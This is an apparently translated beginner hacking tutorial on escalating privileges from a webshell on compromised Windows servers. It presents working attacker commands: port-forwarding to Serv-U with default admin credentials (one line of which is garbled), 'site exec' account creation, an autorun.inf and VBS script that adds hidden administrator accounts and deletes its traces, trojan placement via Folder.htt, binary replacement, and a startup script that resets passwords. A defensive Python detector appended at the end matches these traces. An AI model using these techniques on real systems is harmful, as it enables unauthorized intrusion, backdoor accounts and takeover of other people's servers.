WebShell privilege escalation (beginner edition)

xiaoxiao, 2021-03-06

With so many vulnerabilities published online, I believe everyone has picked up a lot of compromised machines ("broilers"), but all you have on them is a webshell, without system privileges. How do you get system privileges? That is what we discuss here.

OK, enter my webshell. Good, dual CPU, so the speed should be decent; how could I bear not to take it? Enter the password and look around. Anything good? Nothing, close it; there seems to be nothing special. See whether the other drive letters are accessible: click the C drive. Not bad, we can get in.

1. Serv-U escalation

OK, look at what programs he has installed. Oh, there is Serv-U. Remember that Serv-U has a default username and password. Its listening port is 43958 and it can only be accessed locally, but we have port forwarding tools, so that does not matter. Let's take a look at his Serv-U version:

    telnet xxx.xxx.xxx.xxx 21

It reports 3.0. Hey, I have to say that this administrator is really unhappy. I scanned the machine afterwards, and the FTP hole was the only one that had not been patched. Since this is the case, we start our privilege escalation.

Upload fpipe, the port forwarding tool (Figure 3). In the field for running CMD commands, enter:

    d:\wwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1

This forwards the machine's port 43958 to port 81.

Then open Serv-U on our own machine. Open Server on the menu bar and click New Server, then enter the IP and the port; remember that the port is the 81 we just forwarded. The server name can be whatever you like. Then the username: localadministrator password: #l@ or @ $ 是 字))

OK, then click the server and you can see the existing users. Create a new user with all permissions, and do not lock the root directory.

Next is to log in. The FTP login must be done from CMD. Once you are in, the commands are the same as ordinary DOS commands:

    ftp> quote site exec net.exe user hk pass /add
    ftp> quote site exec net

If the other party has 3389 open, I don't need to teach you what to do. If not, establish an IPC connection and upload a Trojan or a tool that opens 3389.

2. autorun.inf plus shell.vbs

autorun.inf:

    [autorun]
    open=shell.vbs

shell.vbs:

    dim wsh
    set wsh = CreateObject("wscript.shell")
    wsh.run "net user guest /active:yes", 0
    wsh.run "net user guest 520ls", 0
    wsh.run "net localgroup administrators guest /add", 0
    wsh.run "net user hkbme 520ls /add", 0
    wsh.run "net localgroup administrators hkbme /add", 0
    wsh.run "cmd.exe /c del autorun.inf", 0
    wsh.run "cmd.exe /c del shell.vbs", 0

The precondition is that you can access the root directory of the other party's drive. Put these two files into the root of his hard drive. Of course, you can also run a Trojan directly this way; you still have to upload the Trojan, and the statements are the same as the last two lines, except that they run the Trojan.

3. Folder.htt with Desktop.ini

Through CMD, overwrite Folder.htt and Desktop.ini, and put them, together with your Trojan or VBS or whatever, in the directory the other party's administrator is most likely to browse. If you think one is not enough, you can place several. Add the code to Folder.htt. But the back door and these two files must be put in the same place, which is a bit of a problem. This can be combined with the VBS launcher, which deletes the uploaded back door after running; that is, codebase = "shell.vbs", with shell.vbs written as above.

4. The replace method

replace can replace a file that is being executed. It is almost possible to get permissions immediately, but I have not done it; you can try it. Replace a file that the other party is executing with a file of the same name that has a Trojan bundled into it. Why not replace it with the Trojan itself? If you replace a key program, won't the machine just hang? So bundling is still better.

Format:

    replace [drive1:][path1]filename [drive2:][path2] [/a] [/p] [/r] [/w]
    replace [drive1:][path1]filename [drive2:][path2] [/p] [/r] [/s] [/w]

    [drive1:][path1]filename  Specifies the source file.
    [drive2:][path2]          Specifies the directory in which files are to be replaced.
    /a  Adds new files to the target directory. Cannot be used with the /s or /u switch.
    /p  Prompts you for confirmation before adding a source file.
    /r  Replaces read-only files as well as unprotected files.
    /s  Replaces files in all subdirectories of the target directory. Cannot be used with the /a switch.
    /w  Waits for you to insert a disk before running.
    /u  Replaces or updates only files that are older than the source files. Cannot be used with the /a switch.

As for whether this command can replace files that you cannot access, you can test that yourself.

5. Scripts

Write a startup/shutdown script configuration file, Scripts.ini. This file name is fixed and cannot be changed. The content is as follows:

    [Startup]
    0CmdLine=a.bat
    0Parameters=

Save Scripts.ini to "C:\Winnt\System32\GroupPolicy\Machine\Scripts". The content of a.bat can be

    net user yonghu mima

or

    net user administrator XXX

This resets the password of any username you want, and you can also add new users, but it relies on a restart.

There is also writing to the SAM, if you can access the other party's SAM file, which affects the admin user's password after he restarts. I suddenly had an idea: could it be replaced with the replace command? You could extract your own SAM file, upload it to any of his directories, and then replace his. But I don't know whether the replacement works if I have no permissions on System32.
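Seen from the defender's side, each step above leaves a recognizable trace. The following is an added example, not part of the original post: it triages process-creation and file-write events for those traces. The event tuples, parent process names and rule names are assumptions made for illustration, and the sample events are constructed.

```python
import re

# Processes that should never manage accounts or write startup files
# (assumed names for the web server, FTP daemon and script hosts).
SERVICE_PARENTS = {"w3wp.exe", "inetinfo.exe", "servudaemon.exe", "wscript.exe", "cscript.exe"}

NET = r"\bnet1?(?:\.exe)?\s+"
COMMAND_RULES = [
    # "-r 43958" is the forwarder's remote-port argument as used in the article.
    ("forward-to-servu-admin-port", re.compile(r"-r\s+43958\b", re.I)),
    ("account-created", re.compile(NET + r"user\s+\S+.*\s/add\b", re.I)),
    ("added-to-administrators", re.compile(NET + r"localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("guest-enabled", re.compile(NET + r"user\s+guest\s+/act(?:ive)?\s*:\s*yes\b", re.I)),
]
FILE_RULES = [
    ("autorun-at-drive-root", re.compile(r"^[a-z]:\\autorun\.inf$", re.I)),
    ("startup-script-config", re.compile(r"\\grouppolicy\\machine\\scripts\\scripts\.ini$", re.I)),
    ("folder-template-dropped", re.compile(r"\\folder\.htt$", re.I)),
]

# Constructed events for illustration: (kind, parent process, command line or path).
SAMPLE_EVENTS = [
    ("proc", "w3wp.exe", r"cmd.exe /c d:\wwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1"),
    ("proc", "ServUDaemon.exe", "net.exe user hk pass /add"),
    ("proc", "wscript.exe", "net user guest /active:yes"),
    ("proc", "wscript.exe", "net localgroup administrators guest /add"),
    ("file", "ServUDaemon.exe", r"C:\autorun.inf"),
    ("file", "w3wp.exe", r"C:\WINNT\System32\GroupPolicy\Machine\Scripts\Scripts.ini"),
    ("proc", "cmd.exe", "net user"),
    ("file", "explorer.exe", r"C:\Users\Public\notes.txt"),
]

def triage(events):
    """Return (rule, severity, detail) for each event that matches a rule."""
    findings = []
    for kind, parent, detail in events:
        rules = COMMAND_RULES if kind == "proc" else FILE_RULES
        for name, pattern in rules:
            if pattern.search(detail):
                # A hit is worse when the actor is a network-facing service or script host.
                severity = "high" if parent.lower() in SERVICE_PARENTS else "medium"
                findings.append((name, severity, detail))
    return findings

if __name__ == "__main__":
    for rule, severity, detail in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {detail}")
```

In practice the events would come from process-creation and file-write auditing on the server; the mitigation the article itself points to is patching Serv-U and removing the web account's write access to drive roots and System32.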

When reposting, please cite the original address: https://www.9cbs.com/read-106052.html
